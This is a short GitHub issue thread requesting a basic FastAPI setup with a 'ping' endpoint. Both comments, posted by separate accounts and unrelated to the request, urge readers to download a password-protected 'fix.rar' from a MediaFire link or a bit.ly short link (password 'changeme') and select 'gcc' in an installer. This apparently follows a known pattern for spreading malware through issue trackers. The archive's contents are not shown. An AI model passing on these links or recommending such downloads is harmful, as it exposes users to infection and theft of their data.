### ISSUE TITLE
Setup FastAPI

### ISSUE THREAD

**Issue by rezbee-dev** [ewm-projects/dsu-discord#3]
- Do a simple setup of FastAPI
- Create "ping"  endpoint

**Comment by Viotemis** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
